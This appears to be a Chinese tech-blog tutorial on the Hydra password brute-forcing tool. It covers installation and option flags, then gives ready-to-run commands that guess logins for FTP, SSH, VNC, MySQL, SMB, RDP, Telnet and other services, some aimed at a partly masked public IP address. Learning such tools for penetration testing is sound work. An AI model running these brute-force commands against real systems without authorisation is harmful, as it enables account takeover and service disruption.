Hydra学习

最新推荐文章于 2024-05-19 07:30:00 发布
最新推荐文章于 2024-05-19 07:30:00 发布
阅读量984 收藏 4
点赞数
分类专栏: tools 文章标签: Hydra 渗透 爆破
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ssjjtt1997/article/details/79762327
版权

1. 简介

1. 介绍

hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。九头蛇是一个并发的登录破解程序,支持许多协议攻击。新模块更容易添加,除此之外,Hydra非常灵活和迅速的。

hydra

2. 官网

官网网址

3. 支持协议

支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL , NCP, NNTP, Oracle Listener , Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。

2. 安装

1. 安装方法

# wget --no-check-certificate https://www.thc.org/releases/hydra-8.1.tar.gz
# tar zxvf hydra-8.1.tar.gz 
# cd hydra-8.1 
# ./configure 
# make && make install

./configure 会检测当前系统一些组件配置,主要是对于破解支持模块的检测,可根据需要安装对应的支持库和依赖包。

2. Kali Linux

在Kali Linux中默认是有hydra的
在控制台输入hydra可以看到参数说明

3. 使用

1. 参数说明

参数说明

-R
继续从上一次进度接着破解
-S
大写,采用SSL链接
-s
小写,可通过这个参数指定非默认端口
-l
指定破解的用户,对特定用户破解
-L
指定用户名字典
-p
小写,指定密码破解,少用,一般是采用密码字典
-P
大写,指定密码字典
-e
可选选项,n:空密码试探,s:使用指定用户和密码试探
-C
使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数
-M
指定目标列表文件一行一条
-o
指定结果输出文件
-f
在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
-t
同时运行的线程数,默认为16
-w
设置最大超时的时间,单位秒,默认是30s
-v / -V
显示详细过程
server
目标ip
service
指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等
OPT
可选项

2. 攻击步骤

  • 选择目标
    顾名思义就是输入你的目标地址,可选:单独IP、CIDR、文档中的列表。

  • 选择协议
    输入你需要爆破的协议,如 ftp:// 等。你需要开始之前探测到服务已经打开

  • 检查可选参数
    假如爆破需要加入额外的参数则添加即可。

3. 攻击实例

hydra -l admin -p password ftp://localhost/

hydra -L default_logins.txt -p test ftp://localhost/

hydra -l admin -P common_passwords.txt ftp://localhost/

hydra -L logins.txt -P passwords.txt ftp://localhost/

4. 实战演示

1. ftp爆破

hydra -l rootclay -P passlist.txt -vV ftp://123.59.xxx.xxx

ftp爆破

2. ssh爆破

hydra -l rootclay -P passlist.txt -vV ssh://123.59.xxx.xxx

ssh爆破

3. vnc爆破

hydra -p Root123! -vV vnc://123.59.xxx.xxx:5901

vnc爆破

4. mysql爆破

hydra -L userlist.txt -P passlist.txt -V mysql://123.59.xxx.xxx:3306

mysql爆破

5. 其它使用案例

1. 破解https:

hydra -m /index.php -l username -P pass.txt IP https

2. 破解teamspeak:

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

3. 破解cisco:

hydra -P pass.txt IP cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

4. 破解smb:

hydra -l administrator -P pass.txt IP smb

5. 破解pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

6. 破解rdp:

hydra IP rdp -l administrator -P pass.txt -V

7. 破解http-proxy:

hydra -l admin -P pass.txt http-proxy://IP

8. 破解telnet

hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
Fudo_Yusei
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hydra学习笔记
zr1213159840的博客
06-04 819
hydra学习笔记
hydra九头蛇详细教程(5分钟内快速学会)
csdnrrxka的博客
11-11 1万+
hydra详细教程(本文的目的是使小白能一眼看懂,能够直接使用hydra进行破解,而不是一大堆hydra的命令) hydra工具介绍 hydra又名九头蛇,是一款爆破神器。 支持linux,windows,mac等多平台,推荐使用kali自带的。 ...
黑客常用的暴力破解工具hydra使用教程(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
05-19 2443
Hydra中文名称九头蛇,是著名黑客组织thc的一款开源的暴力密码破解工具,可以爆破多种服务的账号和密码,包括 Web 登录、数据库、SSH、FTP 等服务,支持 Linux、Windows、Mac 平台安装, Kali Linux中自带 Hydra。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。
Hydra密码爆破工具使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
12-06 2万+
Hydra也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。
Go-面向对象编程详解(封装、继承、多态等)_go封装多态什么意思(4)
m0_60691292的博客
05-07 883
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
hydra 爆破工具
02-22
windows 版 hydra 爆破工具,仅供学习
hydra-examples:学习Hydra的示例和演示代码
05-06
Hydra是由创建的实时编码库。 Hydra使用JavaScript时,其结构几乎不需要任何JavaScript知识。 如果您来自另一种语言,或者是编程新手,则可以在Hydra中构建非常有趣的视觉效果。 本质上,Hydra接受输入→对其进行...
九头蛇安全测试工具(Hydra v9.1)
08-10
一款功能强大,目的合法,易于操作的安全测试工具 此Windows适用版本为Thomas D.提供的脚本,供大家研究学习之用 下载后直接解压至D盘即可(任意)
Hydra-crx插件
04-04
总的来说,"Hydra-crx插件"是一款为提高在线搜索效率而设计的浏览器扩展,通过自动化处理Google搜索结果,帮助用户快速访问相关信息,是提高日常工作和学习效率的好帮手。同时,这也体现了Web技术在个性化和便捷性...
Hydra4.0.65.1067 源码
05-22
总结来说,Hydra4.0.65.1067的源码提供了丰富的学习和开发资源,尤其是对于熟悉Delphi的开发者,可以深入研究其内部机制,提升开发效率,定制自己的开发环境,以及解决特定问题。源码的开放性使得开发者有机会参与到...
oss-hydra-jobs:说明性的hydra项目的示例
02-07
**oss-hydra-jobs** 是一个开源项目,专门用于展示和示范 **Hydra** 的工作原理和使用方法。Hydra 是一个持续集成(CI)系统,尤其在 Nix 包...通过深入学习和实践,你可以利用这些工具创建更健壮、可维护的软件项目。
RemObjects Hydra - 4.0.65.1067 安装后有源代码
03-24
源代码的提供意味着开发者可以直接查看和修改框架的内部实现,这对于学习、调试和定制RemObjects Hydra的行为非常有用。这种透明度也使得开发者能够根据自己的需求来扩展框架的功能。 安装程序(RemObjects Hydra -...
hydra-cluster:Hydra计算集群项目
02-05
开发者可以通过学习项目源代码,了解如何在Raspberry Pi上构建和运行这样的集群,并利用JavaScript进行微服务的开发和部署。对于想要探索分布式计算、实践微服务架构或只是想在有限预算内提升计算能力的个人和团队,...
lightning-hydra-elastic:具有pytorch_lightning + hydra +火炬_elastic的Pytorch项目骨架
02-15
总结来说,"lightning-hydra-elastic"项目骨架利用了PyTorch Lightning的简洁性,Hydra的灵活性以及Torch Elastic的稳定性,为深度学习项目提供了一套全面的解决方案。通过了解并掌握这些工具,开发者能够更高效地...
hydra:基于TCPIP协议的网络通讯库
06-10
Hydra是一款强大的基于TCP/IP协议的网络...同时,深入学习其内部实现机制,有助于优化网络通信效率,提升应用的整体性能。在实际项目中,结合Hydra与其他Java框架(如Spring Boot)可以构建出强大且健壮的网络服务。
九头蛇--hydra爆破密码实现远程连接登录
Aisen_bear的博客
10-03 4493
Hydra是一个相当强大的暴力密码破解工具。该工具支持几乎所有协议的在线密码破解,如FTP、HTTP、HTTPS、MySQL、MS SQL、Oracle、Cisco、IMAP和VNC等。其密码能否被破解,关键在于字典是否足够强大。下面演示一下hydra的简单实用。 准备环节 1台centos虚拟机:IP192.168.xx.xx 账号root 密码1234(靶机) 1台kali虚拟机 (主机) 一份爆破用字典(账户爆破字典、密码爆破字典) 参数简介 hydra的主要选项 -R 修复以前使用.
使用Hydra对基本身份验证进行暴力破解攻击
weixin_64531675的博客
05-29 462
Hydra 是网络登录破解器,也就是在线的破解器, 理论上只要是登录的地方,都可以进行暴力破解。虽然有的登录加入了验证码,但仍然有针对验证码的暴力破解。这意味着它可以用于通过爆破网络服务来发现登录密码。爆破攻击尝试猜测正确的密码,通过尝试所有可能的字符组合。这种攻击一定能找到答案,但可能要花费大量时间。不建议在生产服务器上使用大量密码执行暴力破解,因为我们可能会中断服务、阻塞正常用户或触发保护机制。
lightning-hydra-template
01-29
lightning-hydra-template 是一个用于快速开发基于 PyTorch 和 Lightning 框架的深度学习模型的模板。它结合了 Lightning 框架的便利性和灵活性,以及 Hydra 配置系统的强大功能,帮助开发者快速构建和调试复杂的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值